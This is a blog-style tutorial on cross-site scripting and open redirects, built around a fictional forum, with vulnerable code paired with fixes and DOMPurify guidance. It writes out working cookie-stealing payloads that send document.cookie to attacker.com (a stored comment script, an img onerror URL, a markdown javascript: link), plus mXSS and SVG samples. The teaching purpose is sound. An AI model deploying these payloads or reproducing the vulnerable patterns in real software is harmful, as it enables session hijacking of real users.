A DevForum user posts what looks like a syntax-highlighted code block. It contains a hidden <script> tag. The moment any other logged-in user loads the article, the script fires silently. It reads document.cookie, packages the session token, and fires it to a server the attacker controls. No alert box. No visible sign anything went wrong. Within an hour, forty sessions are hijacked from a single comment.
The developer who built the comment renderer used React. They assumed React protected them. It mostly does — unless you use dangerouslySetInnerHTML. They used it once, eighteen months ago, to support a markdown renderer that needed to inject styled blockquotes. It was never revisited.
That’s XSS. Not a theoretical vulnerability — a routine consequence of trusting user content in the wrong place.
The Browser’s Trust Model
Before looking at how XSS happens, you need to understand why it’s so damaging.
JavaScript that runs inside a page has full access to everything on that page’s origin. document.cookie. localStorage. sessionStorage. Every DOM node. Every form’s contents. The ability to make authenticated fetch() calls to the same origin.
The browser cannot distinguish your JavaScript from injected JavaScript. They run under the same origin, with the same permissions. There’s no flag on a DOM node that says “this script was trusted by the developer.” If a script executes on devforum.com, it has devforum.com’s full authority.
That’s what XSS exploits: the browser’s complete trust in anything that runs inside the page.
Reflected XSS
DevForum has a search feature. The server takes the q parameter and renders results:
// Express route — do not ship this
app.get('/search', (req, res) => {
res.send(`
<h1>Results for: ${req.query.q}</h1>
${renderResults(req.query.q)}
`);
});
The parameter goes directly into the HTML with no escaping. An attacker constructs a URL:
They send this link to a DevForum user via a DM. The victim clicks it. Here’s what happens:
The fix is one line: HTML-encode the parameter before rendering it. req.query.q becomes he.encode(req.query.q) (using the he HTML encoding library), or you switch to a templating engine that escapes by default. The script tag becomes the literal text <script> — visible, harmless.
Why it’s called “reflected”: the payload is sent to the server and reflected straight back in the response. The server is a mirror, not a target.
Stored XSS
Reflected XSS requires the victim to click a crafted link. Stored XSS is more dangerous: the attacker injects the payload once, and it fires for every user who loads the page — no link required.
On DevForum, comments are stored in the database and rendered for every visitor. An attacker posts this comment:
Great article! Really helpful.
<script>
fetch('https://attacker.com/steal', {
method: 'POST',
body: JSON.stringify({ cookie: document.cookie, url: location.href })
});
</script>
The server stores this string in MongoDB. The server renders it into every response for that article. Every logged-in user who visits the article becomes a victim.
This is the attack that hit DevForum at the start of this post. One comment. Forty sessions in an hour. The payload keeps firing until someone notices and deletes it.
DOM-Based XSS
The two variants above both involve the server rendering the payload. DOM-based XSS lives entirely in the client — the server never sees the malicious input.
DevForum has a “highlight by username” feature: open an article with ?highlight=honeysharma in the URL and any mention of that username is visually highlighted. The implementation:
// client.js — do not ship this
const params = new URLSearchParams(location.search);
const user = params.get('highlight');
if (user) {
document.getElementById('highlight-target').innerHTML =
`Highlighting mentions of <strong>${user}</strong>`;
}
The highlight parameter goes straight into innerHTML. An attacker crafts a link:
https://devforum.com/articles/123?highlight=<img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)">
The server sees a completely normal request for article 123. Its response contains no payload. The payload is in the URL. The browser reads it, the client-side JS writes it to the DOM, and it executes.
Why this matters for detection: WAFs, server-side sanitisers, and security scanners that inspect HTTP responses will find nothing. The vulnerability exists entirely in the client.
Mutation XSS (mXSS)
Mutation XSS exploits a gap between what a sanitiser considers safe and what the browser’s HTML parser actually produces.
The browser’s HTML parser does not just read markup — it actively repairs it. When it encounters invalid or malformed HTML (unclosed tags, elements nested where they aren’t allowed, mismatched namespaces), it restructures the tree into something valid rather than refusing to render the page. This is why broken HTML still displays in browsers: the parser fixed it silently.
The problem for sanitisers: a sanitiser checks a string before the parser runs. The parser then transforms that string into a different DOM tree. A string that looked safe to the sanitiser can become unsafe after the parser restructures it.
A classic example:
<!-- Input that passes a naive sanitiser (SVG tags allowed, no scripts) -->
<svg><p><style><img src=x onerror=alert(1)>
<!-- What the browser's parser produces -->
<svg>
<p></p>
<style>
<!-- img tag is moved out of style context -->
</style>
</svg>
<img src="x" onerror="alert(1)">
The sanitiser saw a <style> block with what looked like text. The browser’s parser saw invalid nesting inside SVG and restructured — moving the <img> to a position where its onerror handler could fire.
Where Attacker Input Enters — and Where It Explodes
Every XSS attack has two ends. At one end, attacker-controlled text gets into your application — through a URL parameter, a database value, a postMessage event, something the user typed. At the other end, that text lands somewhere the browser interprets it as code: innerHTML, eval(), an element’s href. Nothing bad happens unless these two ends connect without sanitisation in between.
Security literature calls these ends sources (where attacker input enters) and sinks (where input is interpreted as code or markup). The terms are worth knowing because they’re used in every security audit tool, scanner, and code review checklist — but the underlying idea is just: trace the data from where it comes in to where it lands.
| Category | Examples | Risk | Notes |
|---|---|---|---|
| Sink — DOM write | innerHTML, outerHTML, document.write() | Critical | Most common XSS landing point |
| Sink — code exec | eval(), setTimeout(string), setInterval(string) | Critical | Executes string as JavaScript directly |
| Sink — attribute | el.src = x, el.href = x, el.srcdoc = x | High | javascript: scheme injection via attributes |
| Source — URL | location.search, location.hash, document.referrer | High | Most DOM XSS enters here |
| Source — cross-frame | window.addEventListener('message', e => e.data) | Medium | postMessage without origin check |
| Source — API | res.data.commentBody, res.data.username | High | Stored XSS path — data from DB |
| Source — persistence | localStorage.getItem(), window.name | Medium | Survives navigation; often overlooked |
In code review, the exercise is: trace every source. Follow it through the callstack. Does it reach a sink? If yes, is it sanitised before it gets there?
postMessage: The Cross-Frame Source
window.postMessage is the browser’s mechanism for two pages to communicate across origins — a parent page talking to an embedded payment widget, a micro-frontend talking to a shell app, an analytics iframe sending data back to the host page.
The source entry in the table above is window.addEventListener('message', e => e.data). Here is what a vulnerable implementation looks like:
// Vulnerable — do not ship this
window.addEventListener('message', (event) => {
// 'data' is whatever the sender put in postMessage(data, ...)
// No check on where it came from
document.getElementById('status').innerHTML = event.data;
});
Any page — from any origin — can send a postMessage to this window. If the event data reaches a DOM sink without sanitisation, it is stored XSS delivered through the cross-frame channel instead of a database. Payment iframes, A/B testing tools, analytics scripts, and OAuth popups all use postMessage. If any of them are compromised, a missing origin check turns that compromise into XSS on your page.
The fix is two lines:
const ALLOWED_ORIGIN = 'https://payments.devforum.com';
window.addEventListener('message', (event) => {
if (event.origin !== ALLOWED_ORIGIN) return; // reject unknown senders
document.getElementById('status').textContent = event.data; // textContent, not innerHTML
});
Two changes matter: the event.origin check rejects any sender that isn’t the expected iframe, and textContent instead of innerHTML removes the sink entirely — the data is displayed as literal text, not parsed as markup.
SVG and Markdown Vectors
Two vectors that bypass filters that only check HTML tags:
SVG script injection. SVG is valid HTML5 and the <svg> element creates a different namespace context. A sanitiser that blocks <script> at the HTML level may not check inside SVG:
<svg>
<script>alert(document.cookie)</script>
</svg>
This executes in Chrome, Firefox, and Safari. A filter that only pattern-matches <script> on the outer HTML will miss it.
Markdown javascript: links. Markdown renderers that convert [text](url) to <a href="url">text</a> without checking the URL scheme:
[Click here for the results](javascript:fetch('https://attacker.com/steal?c='+document.cookie))
This passes sanitisers that only look for HTML tags. The link renders cleanly. When the victim clicks it, the JS executes under the page’s origin.
React, Vue, Angular: The Escape Hatches
React, Vue, and Angular protect you by default. When you render user content through the normal template path, the framework converts it to a text node — not markup:
// Safe — React renders this as a text node, not HTML
function Comment({ body }) {
return <div className="comment">{body}</div>;
}
If body is <script>alert(1)</script>, React renders it as the literal characters <script>alert(1)</script> — visible, not executable.
The problem is the escape hatch:
// Vulnerable — raw HTML injected into the DOM
function Comment({ body }) {
return <div dangerouslySetInnerHTML={{ __html: body }} />;
}
// Fixed — sanitise before injecting
import DOMPurify from 'dompurify';
function Comment({ body }) {
return (
<div
dangerouslySetInnerHTML={{ __html: DOMPurify.sanitize(body) }}
/>
);
}
The same pattern in Vue (v-html) and Angular (bypassSecurityTrustHtml):
<!-- Vue — vulnerable -->
<div v-html="comment.body"></div>
<!-- Vue — fixed -->
<div v-html="sanitize(comment.body)"></div>
// Angular — vulnerable
this.safeHtml = this.sanitizer.bypassSecurityTrustHtml(comment.body);
// Angular — fixed: don't use bypassSecurityTrustHtml with user content
// Let Angular's built-in sanitiser handle it, or pre-sanitise with DOMPurify
DOMPurify in Practice
DOMPurify is the standard client-side sanitiser. It works by parsing the input using the browser’s own HTML parser, walking the resulting DOM, and removing anything that doesn’t pass its allowlist — then serialising the safe DOM back to a string.
import DOMPurify from 'dompurify';
// Basic usage — safe defaults
const clean = DOMPurify.sanitize(dirty);
// Allow specific tags beyond the defaults
const clean = DOMPurify.sanitize(dirty, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'ul', 'li'],
ALLOWED_ATTR: ['href'],
});
Two configuration mistakes that open XSS vectors:
// Dangerous — ALLOW_DATA_ATTR re-enables data-* attributes
// Standard HTML does not execute data-* attributes, but frameworks that
// use data-* for behaviour bindings (e.g. older AngularJS data-ng-* directives,
// Alpine.js x-* equivalents) can turn them into XSS vectors in those contexts.
DOMPurify.sanitize(dirty, { ALLOW_DATA_ATTR: true });
// Dangerous — FORCE_BODY: false changes the parsing context
// DOMPurify defaults to FORCE_BODY: true (body-context parsing).
// Setting it to false switches to fragment-context parsing, which the browser
// handles differently — some mXSS payloads survive only in a non-body context.
// Only override this if you fully understand the parsing difference.
DOMPurify.sanitize(dirty, { FORCE_BODY: false });
XSS Variant Comparison
| Variant | Source | Server round-trip? | Persistence | Severity |
|---|---|---|---|---|
| Reflected | URL parameter | Yes — payload in response | None — per request | High |
| Stored | Database (user content) | Yes — payload in response | Permanent until deleted | Critical |
| DOM-based | URL / postMessage | No | None | High |
| Mutation (mXSS) | Any sanitised input | Varies | Varies | Critical |
Open Redirect: The Attack that Chains With Everything
Open redirect is not XSS, but it lives in the same place — URL parameters — and is frequently chained with it. A DevForum login page that accepts a next parameter to redirect the user after sign-in:
// Express — do not ship this
app.get('/login', (req, res) => {
// After auth, redirect to the page the user was trying to reach
const next = req.query.next || '/dashboard';
res.redirect(next); // no validation
});
An attacker sends https://devforum.com/login?next=https://evil.com/steal. The user sees a legitimate DevForum URL, logs in, and is redirected to evil.com — a phishing page styled to look like DevForum’s dashboard. The redirect happens silently. The user never typed evil.com.
The fix is to validate the redirect destination against an allowlist of internal paths:
// Only permit relative paths starting with /
function isSafeRedirect(url) {
return typeof url === 'string' && url.startsWith('/') && !url.startsWith('//');
}
const next = req.query.next;
res.redirect(isSafeRedirect(next) ? next : '/dashboard');
//evil.com is a protocol-relative URL — it redirects to evil.com on whichever scheme the browser picks. The !url.startsWith('//') check catches it. Anything that starts with / and not // is a relative path on the same host.
Every occurrence warrants a question: where does this HTML come from, and is it passing through DOMPurify before it arrives? If the answer to either is “I’m not sure”, treat it as a vulnerability.
Search the codebase for location.search, location.hash, URLSearchParams, and document.referrer. For each one, trace the value to where it lands. If it reaches innerHTML or any DOM sink without sanitisation, you have DOM XSS.
The vulnerability is in the HTML the renderer produces — not in the markdown source. Run DOMPurify on the rendered HTML. Also verify that your renderer does not produce <a href="javascript:..."> links.
Regex-based sanitisers fail against SVG namespacing, mXSS mutations, and javascript: scheme injection. DOMPurify uses the parser itself. Pin its version and subscribe to its release notes.
XSS prevention (sanitisation, framework escaping) is the first line. CSP — the subject of the next post — is the second. If a payload slips through the first line, CSP blocks its execution. Both lines are required.